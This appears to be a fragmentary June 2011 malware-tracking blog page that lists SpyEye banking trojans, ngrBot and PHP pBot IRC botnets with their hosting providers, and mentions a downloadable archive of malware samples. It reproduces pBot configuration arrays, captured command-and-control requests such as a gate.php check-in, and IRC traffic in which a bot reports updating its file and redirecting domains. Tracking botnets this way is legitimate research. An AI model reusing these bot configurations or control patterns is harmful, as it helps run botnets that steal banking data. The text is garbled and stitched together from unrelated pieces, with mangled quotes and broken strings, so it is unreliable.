Month: June 2011 bots hosted in Korea, Republic Of Ulsan Dacom Corp)

var $config = array(“server”=>””, “port”=>”9999”, “pass”=>””, “prefix”=>”syik”, “maxrand”=>”4”, “chan”=>”#setoran”, “chan2″=>”#setoran”, “key”=>”setoran”, “modes”=>”+p”, “password”=>”setoran”, “trigger”=>”.”, “hostauth”=>”racrew” hosting infos:

21mb malware samples

Alot of spyeye variants and other banking trojans,irc bots,worms etc Download: (bfbot creator reborn?iserdo using spyeye hosted in Netherlands Amsterdam Snel Internet Services B.v)

Spy Eye Panel: Spy Eye Sample: just in case first link is removed Websites used to infect people: ??? iserdo need money ? ???? lol HTTP QueriesHTTP Query Text – 5xf9~x15x10x11x11x11x11x16x15x15x15x15x17x17x17x17x1ax1ax1ax1anx01!U4V:__-H8ty{{juuuux17xx0cS4A(LLx19jx0f}x0fN GET /kurac/gate.php?guid=User!SANDBOXB!38BA2BE7&ver=10299&stat=ONLINE&ie=6.0.2900.2180&os=5.1.2600&ut=Admin&cpu=100&ccrc=FADB319B&md5=e47f5cbd0ae6d17cbeb5530db3f9779f HTTP/1.1 Windows Api CallsPId Image Name Address Function ( Parameters ) | Return Value Eye Banking Trojan hosted in Viet Nam Layer 2 -customer Nework Of Vtdc)

ishigo is a poor french lamer he’s known in carding boards Exe File: Avira fail detecting this: Nom du fichier Résultat ptcmd.exe FALSE POSITIVE Le fichier ‘ptcmd.exe’ a été classifié comme ‘FALSE POSITIVE’. Cela signifie que ce fichier n’est pas dangereux et qu’il s’agit d’un message erroné de notre part. Le modèle de détection

HTTP malware

DNS QueriesDNS Query Text IN A + IN A + IN A + HTTP QueriesHTTP Query Text POST /files/filtect.php HTTP/1.0 POST /apuracao/filtect.php HTTP/1.0 POST /memo/filtect.php HTTP/1.0 DNS QueriesDNS Query Text IN A + IN A + IN A + IN A + HTTP QueriesHTTP Query hosted in Russian Federation Oao Webalta)

Remote Host Port Number 80 80 80 7654 PASS ngrBot NICK n{US|XPa}sxwscly USER sxwscly 0 0 :sxwscly JOIN #oldgold noKIDs PRIVMSG #oldgold :[d=”” s=”167936 bytes”] Updated bot file “C:Documents and SettingsUserNameApplication DataWcxaxw.exe” – Download retries: 0 PRIVMSG #oldgold :[DNS]: Blocked 0 domain(s) – Redirected 31 domain(s) hosting infos: linux bots hosted in United States Limestone Networks Inc)

class pBot { var $config = array(“server”=>””, “port”=>”2390”, “pass”=>””, “prefix”=>”BoT”, “maxrand”=>”3”, “chan”=>”#dada”, “chan2″=>”#dada”, “key”=>”123456”, “modes”=>”+p”, “password”=>”123”, “trigger”=>”.”, “hostauth”=>”*” // * for any hostname (remember: /setvhost ); Clients: I have 162 clients and 0 servers Local users: Current Local Users: 162 Max: 585 Global users: Current Global Users: 162 Max: 477 Joins: [A]BoT824 12[]